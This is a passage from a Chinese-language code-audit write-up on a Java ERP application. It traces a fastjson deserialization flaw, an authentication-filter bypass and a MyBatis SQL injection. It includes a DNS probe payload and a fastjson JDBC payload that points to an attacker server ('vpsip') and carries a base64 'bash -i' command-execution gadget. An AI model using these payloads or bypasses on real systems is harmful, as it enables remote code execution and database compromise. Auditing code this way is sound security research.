<span class=o>}</span>
</pre></div>
<p>查看getInfo函数的调用处比较多一个一个筛选这里选择UserComponent.java中的getUserList方法进行分析</p>
<div class=highlight><pre><span></span><span class=kd>private</span> <span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>getUserList</span><span class=o>(</span><span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>map</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>String</span> <span class=n>search</span> <span class=o>=</span> <span class=n>map</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>);</span>
<span class=c1>// 这里</span>
<span class=n>String</span> <span class=n>userName</span> <span class=o>=</span> <span class=n>StringUtil</span><span class=o>.</span><span class=na>getInfo</span><span class=o>(</span><span class=n>search</span><span class=o>,</span> <span class=s>"userName"</span><span class=o>);</span>
<span class=n>String</span> <span class=n>loginName</span> <span class=o>=</span> <span class=n>StringUtil</span><span class=o>.</span><span class=na>getInfo</span><span class=o>(</span><span class=n>search</span><span class=o>,</span> <span class=s>"loginName"</span><span class=o>);</span>
<span class=n>String</span> <span class=n>order</span> <span class=o>=</span> <span class=n>QueryUtils</span><span class=o>.</span><span class=na>order</span><span class=o>(</span><span class=n>map</span><span class=o>);</span>
<span class=n>String</span> <span class=n>filter</span> <span class=o>=</span> <span class=n>QueryUtils</span><span class=o>.</span><span class=na>filter</span><span class=o>(</span><span class=n>map</span><span class=o>);</span>
<span class=k>return</span> <span class=n>userService</span><span class=o>.</span><span class=na>select</span><span class=o>(</span><span class=n>userName</span><span class=o>,</span> <span class=n>loginName</span><span class=o>,</span> <span class=n>QueryUtils</span><span class=o>.</span><span class=na>offset</span><span class=o>(</span><span class=n>map</span><span class=o>),</span> <span class=n>QueryUtils</span><span class=o>.</span><span class=na>rows</span><span class=o>(</span><span class=n>map</span><span class=o>));</span>
<span class=o>}</span>
</pre></div>
<p>逐层向上调用分析可以得知在ResourceController.java中调用select即search参数可控</p>
<div class=highlight><pre><span></span><span class=nd>@GetMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/{apiName}/list"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>getList</span><span class=o>(</span><span class=nd>@PathVariable</span><span class=o>(</span><span class=s>"apiName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>apiName</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>PAGE_SIZE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>pageSize</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>CURRENT_PAGE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>currentPage</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>String</span> <span class=n>search</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>requestToMap</span><span class=o>(</span><span class=n>request</span><span class=o>);</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>search</span><span class=o>);</span>
<span class=n>PageQueryInfo</span> <span class=n>queryInfo</span> <span class=o>=</span> <span class=k>new</span> <span class=n>PageQueryInfo</span><span class=o>();</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>pageSize</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>pageSize</span> <span class=o>&lt;=</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=n>pageSize</span> <span class=o>=</span> <span class=mi>10</span><span class=o>;</span>
<span class=o>}</span>
<span class=n>String</span> <span class=n>offset</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>getPageOffset</span><span class=o>(</span><span class=n>currentPage</span><span class=o>,</span> <span class=n>pageSize</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>offset</span><span class=o>))</span> <span class=o>{</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>OFFSET</span><span class=o>,</span> <span class=n>offset</span><span class=o>);</span>
<span class=o>}</span>
<span class=c1>// 这里</span>
<span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>list</span> <span class=o>=</span> <span class=n>configResourceManager</span><span class=o>.</span><span class=na>select</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>);</span>
<span class=n>objectMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=s>"page"</span><span class=o>,</span> <span class=n>queryInfo</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>list</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;</span><span class=n>Object</span><span class=o>&gt;());</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>BusinessConstants</span><span class=o>.</span><span class=na>DEFAULT_LIST_NULL_NUMBER</span><span class=o>);</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=s>"查找不到数据"</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setRows</span><span class=o>(</span><span class=n>list</span><span class=o>);</span>
<span class=n>queryInfo</span><span class=o>.</span><span class=na>setTotal</span><span class=o>(</span><span class=n>configResourceManager</span><span class=o>.</span><span class=na>counts</span><span class=o>(</span><span class=n>apiName</span><span class=o>,</span> <span class=n>parameterMap</span><span class=o>));</span>
<span class=k>return</span> <span class=n>returnJson</span><span class=o>(</span><span class=n>objectMap</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>name</span><span class=o>,</span> <span class=n>ErpInfo</span><span class=o>.</span><span class=na>OK</span><span class=o>.</span><span class=na>code</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>根据路由分析这里的apiName为user这样能够寻找到UserComponent里的select方法</p>
<p><strong>测试</strong></p>
<p>抓包设置payload</p>
<div class=highlight><pre><span></span><span class=o>{</span><span class=s>"@type"</span><span class=o>:</span><span class=s>"java.net.Inet4Address"</span><span class=o>,</span><span class=s>"val"</span><span class=o>:</span><span class=s>"xxxxxx"</span><span class=o>}</span>
</pre></div>
<p><a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201232916-a8cd8460-c116-1.png><img src="
<p>收到DNS请求证明漏洞存在</p>
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201232940-b756f214-c116-1.png><img src=
<p>接下来可以进行LDAP注入但是需要确定AutoType是否开启</p>
<p>可以通过以下代码开启</p>
<div class=highlight><pre><span></span><span class=n>ParserConfig</span><span class=o>.</span><span class=na>getGlobalInstance</span><span class=o>().</span><span class=na>setAutoTypeSupport</span><span class=o>(</span><span class=kc>true</span><span class=o>);</span>
</pre></div>
<p>但是在实际测试的过程中没有开启可以通过mysql服务来打</p>
<p>payload</p>
<div class=highlight><pre><span></span><span class=p>{</span>
<span class=nt>"@type"</span><span class=p>:</span> <span class=s2>"java.lang.AutoCloseable"</span><span class=p>,</span>
<span class=nt>"@type"</span><span class=p>:</span> <span class=s2>"com.mysql.jdbc.JDBC4Connection"</span><span class=p>,</span>
<span class=nt>"hostToConnectTo"</span><span class=p>:</span> <span class=s2>"vpsip"</span><span class=p>,</span>
<span class=nt>"portToConnectTo"</span><span class=p>:</span> <span class=mi>3306</span><span class=p>,</span>
<span class=nt>"info"</span><span class=p>:</span> <span class=p>{</span>
<span class=nt>"user"</span><span class=p>:</span> <span class=s2>"yso_CommonsCollections6_bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}"</span><span class=p>,</span>
<span class=nt>"password"</span><span class=p>:</span> <span class=s2>"pass"</span><span class=p>,</span>
<span class=nt>"statementInterceptors"</span><span class=p>:</span> <span class=s2>"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor"</span><span class=p>,</span>
<span class=nt>"autoDeserialize"</span><span class=p>:</span> <span class=s2>"true"</span><span class=p>,</span>
<span class=nt>"NUM_HOSTS"</span><span class=p>:</span> <span class=s2>"1"</span>
<span class=p>},</span>
<span class=nt>"databaseToConnectTo"</span><span class=p>:</span> <span class=s2>"dbname"</span><span class=p>,</span>
<span class=nt>"url"</span><span class=p>:</span> <span class=s2>""</span>
<span class=p>}</span>
</pre></div>
<p>参考:<a href=https://www.cnblogs.com/kingbridge/articles/16720318.html target=_blank>蓝帽杯2022决赛 - 赌怪 writeup - KingBridge - 博客园 (cnblogs.com)</a></p>
<p>这里就不继续测试大致原理是这样如果不懂fastjson请参考<a href=https://dililearngent.github.io/2023/02/10/fastjson-security/ target=_blank>Java安全之FastJson漏洞分析与利用 | DiliLearngent's Blog</a></p>
<p><strong>依赖log4j</strong></p>
<div class=highlight><pre><span></span><span class=nt>&lt;dependency&gt;</span>
<span class=nt>&lt;groupId&gt;</span>org.apache.logging.log4j<span class=nt>&lt;/groupId&gt;</span>
<span class=nt>&lt;artifactId&gt;</span>log4j-to-slf4j<span class=nt>&lt;/artifactId&gt;</span>
<span class=nt>&lt;version&gt;</span>2.10.0<span class=nt>&lt;/version&gt;</span>
<span class=nt>&lt;scope&gt;</span>compile<span class=nt>&lt;/scope&gt;</span>
<span class=nt>&lt;/dependency&gt;</span>
</pre></div>
<p>无相关漏洞可以通过官方文档或者maven仓库中查看<a href=https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-to-slf4j target=_blank>Maven Repository: org.apache.logging.log4j » log4j-to-slf4j (mvnrepository.com)</a></p>
<ul>
<li>还有一些配置文件这里没有涉及到就不提了</li>
</ul>
<h2 id=toc-4>Filter分析</h2>
<p>在项目中只存在一个Filter类即LogCostFilter观察其doFilter方法</p>
<div class=highlight><pre><span></span><span class=nd>@Override</span>
<span class=kd>public</span> <span class=kt>void</span> <span class=nf>doFilter</span><span class=o>(</span><span class=n>ServletRequest</span> <span class=n>request</span><span class=o>,</span> <span class=n>ServletResponse</span> <span class=n>response</span><span class=o>,</span>
<span class=n>FilterChain</span> <span class=n>chain</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>IOException</span><span class=o>,</span> <span class=n>ServletException</span> <span class=o>{</span>
<span class=n>HttpServletRequest</span> <span class=n>servletRequest</span> <span class=o>=</span> <span class=o>(</span><span class=n>HttpServletRequest</span><span class=o>)</span> <span class=n>request</span><span class=o>;</span>
<span class=n>HttpServletResponse</span> <span class=n>servletResponse</span> <span class=o>=</span> <span class=o>(</span><span class=n>HttpServletResponse</span><span class=o>)</span> <span class=n>response</span><span class=o>;</span>
<span class=n>String</span> <span class=n>requestUrl</span> <span class=o>=</span> <span class=n>servletRequest</span><span class=o>.</span><span class=na>getRequestURI</span><span class=o>();</span>
<span class=c1>//具体,比如:处理若用户未登录,则跳转到登录页</span>
<span class=n>Object</span> <span class=n>userInfo</span> <span class=o>=</span> <span class=n>servletRequest</span><span class=o>.</span><span class=na>getSession</span><span class=o>().</span><span class=na>getAttribute</span><span class=o>(</span><span class=s>"user"</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>userInfo</span><span class=o>!=</span><span class=kc>null</span><span class=o>)</span> <span class=o>{</span> <span class=c1>//如果已登录,不阻止</span>
<span class=n>chain</span><span class=o>.</span><span class=na>doFilter</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>response</span><span class=o>);</span>
<span class=k>return</span><span class=o>;</span>
<span class=o>}</span>
<span class=k>if</span> <span class=o>(</span><span class=n>requestUrl</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=o>(</span><span class=n>requestUrl</span><span class=o>.</span><span class=na>contains</span><span class=o>(</span><span class=s>"/doc.html"</span><span class=o>)</span> <span class=o>||</span>
<span class=n>requestUrl</span><span class=o>.</span><span class=na>contains</span><span class=o>(</span><span class=s>"/register.html"</span><span class=o>)</span> <span class=o>||</span> <span class=n>requestUrl</span><span class=o>.</span><span class=na>contains</span><span class=o>(</span><span class=s>"/login.html"</span><span class=o>)))</span> <span class=o>{</span>
<span class=n>chain</span><span class=o>.</span><span class=na>doFilter</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>response</span><span class=o>);</span>
<span class=k>return</span><span class=o>;</span>
<span class=o>}</span>
<span class=c1>// 使用ignoredList中内容进行认证</span>
<span class=k>if</span> <span class=o>(</span><span class=n>verify</span><span class=o>(</span><span class=n>ignoredList</span><span class=o>,</span> <span class=n>requestUrl</span><span class=o>))</span> <span class=o>{</span>
<span class=n>chain</span><span class=o>.</span><span class=na>doFilter</span><span class=o>(</span><span class=n>servletRequest</span><span class=o>,</span> <span class=n>response</span><span class=o>);</span>
<span class=k>return</span><span class=o>;</span>
<span class=o>}</span>
<span class=c1>// 白名单过滤</span>
<span class=k>if</span> <span class=o>(</span><span class=kc>null</span> <span class=o>!=</span> <span class=n>allowUrls</span> <span class=o>&amp;&amp;</span> <span class=n>allowUrls</span><span class=o>.</span><span class=na>length</span> <span class=o>&gt;</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=k>for</span> <span class=o>(</span><span class=n>String</span> <span class=n>url</span> <span class=o>:</span> <span class=n>allowUrls</span><span class=o>)</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>requestUrl</span><span class=o>.</span><span class=na>startsWith</span><span class=o>(</span><span class=n>url</span><span class=o>))</span> <span class=o>{</span>
<span class=n>chain</span><span class=o>.</span><span class=na>doFilter</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>response</span><span class=o>);</span>
<span class=k>return</span><span class=o>;</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=n>servletResponse</span><span class=o>.</span><span class=na>sendRedirect</span><span class=o>(</span><span class=s>"/login.html"</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>根据对init方法的分析可知ignoredUrls为[.css.js.jpg.png.gif.ico]allowUrls为[/user/login/user/registerUser/v2/api-docs]</p>
<p>先看verify方法</p>
<div class=highlight><pre><span></span><span class=kd>private</span> <span class=kd>static</span> <span class=n>String</span> <span class=n>regexPrefix</span> <span class=o>=</span> <span class=s>"^.*"</span><span class=o>;</span>
<span class=kd>private</span> <span class=kd>static</span> <span class=n>String</span> <span class=n>regexSuffix</span> <span class=o>=</span> <span class=s>".*$"</span><span class=o>;</span>
<span class=kd>private</span> <span class=kd>static</span> <span class=kt>boolean</span> <span class=nf>verify</span><span class=o>(</span><span class=n>List</span><span class=o>&lt;</span><span class=n>String</span><span class=o>&gt;</span> <span class=n>ignoredList</span><span class=o>,</span> <span class=n>String</span> <span class=n>url</span><span class=o>)</span> <span class=o>{</span>
<span class=k>for</span> <span class=o>(</span><span class=n>String</span> <span class=n>regex</span> <span class=o>:</span> <span class=n>ignoredList</span><span class=o>)</span> <span class=o>{</span>
<span class=n>Pattern</span> <span class=n>pattern</span> <span class=o>=</span> <span class=n>Pattern</span><span class=o>.</span><span class=na>compile</span><span class=o>(</span><span class=n>regexPrefix</span> <span class=o>+</span> <span class=n>regex</span> <span class=o>+</span> <span class=n>regexSuffix</span><span class=o>);</span>
<span class=n>Matcher</span> <span class=n>matcher</span> <span class=o>=</span> <span class=n>pattern</span><span class=o>.</span><span class=na>matcher</span><span class=o>(</span><span class=n>url</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>matcher</span><span class=o>.</span><span class=na>matches</span><span class=o>())</span> <span class=o>{</span>
<span class=k>return</span> <span class=kc>true</span><span class=o>;</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>return</span> <span class=kc>false</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>将ignoredUrls中的逐个元素拼接成正则表达式后与当前url进行匹配匹配成功即返回true例如第一个元素形成的正则表达式为<code>^.*.css.*$</code>即只要包含ignoredUrls中的任意一个元素即可在不登录的情况下访问</p>
<p>在白名单过滤中只要请求url中以/user/login、/user/registerUser、/v2/api-docs开头即不需要登陆即可访问</p>
<h2 id=toc-5>路由分析</h2>
<p>大部分请求路径都包含在Controller文件夹中这里有一个特殊的类即ResourceController.java它的请求路径中包含{apiName}代码中使用CommonQueryManager.java类对其进行处理以select方法为例</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>select</span><span class=o>(</span><span class=n>String</span> <span class=n>apiName</span><span class=o>,</span> <span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>apiName</span><span class=o>))</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>container</span><span class=o>.</span><span class=na>getCommonQuery</span><span class=o>(</span><span class=n>apiName</span><span class=o>).</span><span class=na>select</span><span class=o>(</span><span class=n>parameterMap</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;</span><span class=n>Object</span><span class=o>&gt;();</span>
<span class=o>}</span>
<span class=kd>public</span> <span class=n>ICommonQuery</span> <span class=nf>getCommonQuery</span><span class=o>(</span><span class=n>String</span> <span class=n>apiName</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>configComponentMap</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>apiName</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>configComponentMap存放的是Component类即如图所示</p>
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233008-c838f500-c116-1.png><img src=
<p>具体可通过调试得到这样通过apiname首字母大写+ Component即得到处理的对应类从该类中选择select方法</p>
<h2 id=toc-6>SQL注入</h2>
<h3 id=toc-7>审计关键点</h3>
<ul>
<li>重点关注创建查询的函数如 <code>createQuery()</code><code>createSQLQuery()</code><code>createNativeQuery()</code></li>
<li>定位SQL语句上下文查看是否有参数直接拼接是否有对模糊查询关键字的过滤。</li>
<li>是否使用预编译技术,预编译是否完整,关键函数定位<code>setObject()</code><code>setInt()</code><code>setString()</code><code>setSQLXML()</code>关联上下文搜索<code>set*</code>开头的函数。</li>
<li>Mybatis中搜索${}因为对于like模糊查询、order by排序、范围查询in、动态表名/列名,没法使用预编译,只能拼接,所以还是需要手工防注入,此时可查看相关逻辑是否正确。</li>
<li>JPA搜索<code>JpaSort.unsafe()</code>查看是否用实体之外的字段对查询结果排序进行了SQL的拼接。以及查看<code>EntityManager</code>的使用也可能存在拼接SQL的情况。</li>
</ul>
<h3 id=toc-8>注入点1</h3>
<h4>分析</h4>
<p>根据SQL注入代码审计经验Mybatis框架下一般寻找mapper下的xml文件中的<code>${}</code></p>
<p><a id=img5 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233022-d09f78b8-c116-1.png><img src="
<p>挺多先看这两个对应在UserMapperEx.xml文件中查询如下</p>
<div class=highlight><pre><span></span><span class=nt>&lt;select</span> <span class=na>id=</span><span class=s>"countsByUser"</span> <span class=na>resultType=</span><span class=s>"java.lang.Long"</span><span class=nt>&gt;</span>
select count(user.id)
FROM jsh_user user
left join jsh_user_business ub on user.id=ub.key_id
left join jsh_orga_user_rel rel on user.id=rel.user_id and ifnull(rel.delete_flag,'0') !='1'
left join jsh_organization org on rel.orga_id=org.id and ifnull(org.org_stcd,'0') !='5'
where 1=1
and ifnull(user.status,'0') not in('1','2')
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"userName != null"</span><span class=nt>&gt;</span>
and user.username like '%${userName}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;if</span> <span class=na>test=</span><span class=s>"loginName != null"</span><span class=nt>&gt;</span>
and user.login_name like '%${loginName}%'
<span class=nt>&lt;/if&gt;</span>
<span class=nt>&lt;/select&gt;</span>
</pre></div>
<p>一看like只要这里两个参数可控另外这里要查询的是一个数字无其他可用的返回参数即可能存在SQL注入优先考虑时间盲注。找到对应的Mappper即UserMapperEx</p>
<div class=highlight><pre><span></span><span class=n>Long</span> <span class=nf>countsByUser</span><span class=o>(</span>
<span class=nd>@Param</span><span class=o>(</span><span class=s>"userName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>userName</span><span class=o>,</span>
<span class=nd>@Param</span><span class=o>(</span><span class=s>"loginName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>loginName</span><span class=o>);</span>
</pre></div>
<p>继续网上找调用此方法的serviceCtrl+B找到上层UserService</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=n>Long</span> <span class=nf>countUser</span><span class=o>(</span><span class=n>String</span> <span class=n>userName</span><span class=o>,</span> <span class=n>String</span> <span class=n>loginName</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>Long</span> <span class=n>result</span><span class=o>=</span><span class=kc>null</span><span class=o>;</span>
<span class=k>try</span><span class=o>{</span>
<span class=c1>// 这里</span>
<span class=n>result</span><span class=o>=</span><span class=n>userMapperEx</span><span class=o>.</span><span class=na>countsByUser</span><span class=o>(</span><span class=n>userName</span><span class=o>,</span> <span class=n>loginName</span><span class=o>);</span>
<span class=o>}</span><span class=k>catch</span><span class=o>(</span><span class=n>Exception</span> <span class=n>e</span><span class=o>){</span>
<span class=n>JshException</span><span class=o>.</span><span class=na>readFail</span><span class=o>(</span><span class=n>logger</span><span class=o>,</span> <span class=n>e</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>result</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>继续Ctrl+B这里有两个调用处由于第一个UserController中调用的countUser两个参数均为null暂时忽略来到UserComponent</p>
<div class=highlight><pre><span></span><span class=nd>@Override</span>
<span class=kd>public</span> <span class=n>Long</span> <span class=nf>counts</span><span class=o>(</span><span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>map</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=n>String</span> <span class=n>search</span> <span class=o>=</span> <span class=n>map</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>);</span>
<span class=n>String</span> <span class=n>userName</span> <span class=o>=</span> <span class=n>StringUtil</span><span class=o>.</span><span class=na>getInfo</span><span class=o>(</span><span class=n>search</span><span class=o>,</span> <span class=s>"userName"</span><span class=o>);</span>
<span class=n>String</span> <span class=n>loginName</span> <span class=o>=</span> <span class=n>StringUtil</span><span class=o>.</span><span class=na>getInfo</span><span class=o>(</span><span class=n>search</span><span class=o>,</span> <span class=s>"loginName"</span><span class=o>);</span>
<span class=c1>// 这里</span>
<span class=k>return</span> <span class=n>userService</span><span class=o>.</span><span class=na>countUser</span><span class=o>(</span><span class=n>userName</span><span class=o>,</span> <span class=n>loginName</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>还是没有到Controller层继续Ctrl+B来到CommonQueryManager</p>
<div class=highlight><pre><span></span><span class=cm>/**</span>
<span class=cm> * 计数</span>
<span class=cm> * @param apiName</span>
<span class=cm> * @param parameterMap</span>
<span class=cm> * @return</span>
<span class=cm> */</span>
<span class=kd>public</span> <span class=n>Long</span> <span class=nf>counts</span><span class=o>(</span><span class=n>String</span> <span class=n>apiName</span><span class=o>,</span> <span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>apiName</span><span class=o>))</span> <span class=o>{</span>
<span class=c1>// 这里</span>
<span class=k>return</span> <span class=n>container</span><span class=o>.</span><span class=na>getCommonQuery</span><span class=o>(</span><span class=n>apiName</span><span class=o>).</span><span class=na>counts</span><span class=o>(</span><span class=n>parameterMap</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=n>BusinessConstants</span><span class=o>.</span><span class=na>DEFAULT_LIST_NULL_NUMBER</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>继续往上终于来到ResourceController</p>
<div class=highlight><pre><span></span><span class=nd>@GetMapping</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=s>"/{apiName}/list"</span><span class=o>)</span>
<span class=kd>public</span> <span class=n>String</span> <span class=nf>getList</span><span class=o>(</span><span class=nd>@PathVariable</span><span class=o>(</span><span class=s>"apiName"</span><span class=o>)</span> <span class=n>String</span> <span class=n>apiName</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>PAGE_SIZE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>pageSize</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>CURRENT_PAGE</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>Integer</span> <span class=n>currentPage</span><span class=o>,</span>
<span class=nd>@RequestParam</span><span class=o>(</span><span class=n>value</span> <span class=o>=</span> <span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>required</span> <span class=o>=</span> <span class=kc>false</span><span class=o>)</span> <span class=n>String</span> <span class=n>search</span><span class=o>,</span>
<span class=n>HttpServletRequest</span> <span class=n>request</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=c1>// search参数放入map</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>requestToMap</span><span class=o>(</span><span class=n>request</span><span class=o>);</span>
<span class=n>parameterMap</span><span class=o>.</span><span class=na>put</span><span class=o>(</span><span class=n>Constants</span><span class=o>.</span><span class=na>SEARCH</span><span class=o>,</span> <span class=n>search</span><span class=o>);</span>
<span class=n>PageQueryInfo</span> <span class=n>queryInfo</span> <span class=o>=</span> <span class=k>new</span> <span class=n>PageQueryInfo</span><span class=o>();</span>
<span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;</span> <span class=n>objectMap</span> <span class=o>=</span> <span class=k>new</span> <span class=n>HashMap</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>Object</span><span class=o>&gt;();</span>
<span class=k>if</span> <span class=o>(</span><span class=n>pageSize</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>pageSize</span> <span class=o>&lt;=</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=n>pageSize</span> <span class=o>=</span> <span class=mi>10</span><span class=o>;</span>
<span class=o>}</span>
<span class=n>String</span> <span class=n>offset</span> <span class=o>=</span> <span class=n>ParamUtils</span><span class=o>.</span><span class=na>getPageOffset</span><span class=o>(</span><span class=n>currentPage</span><span class=o>,</span> <span class=n>pageSize</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>offset</span><span class=o>))</span> <span class=o>{</span>
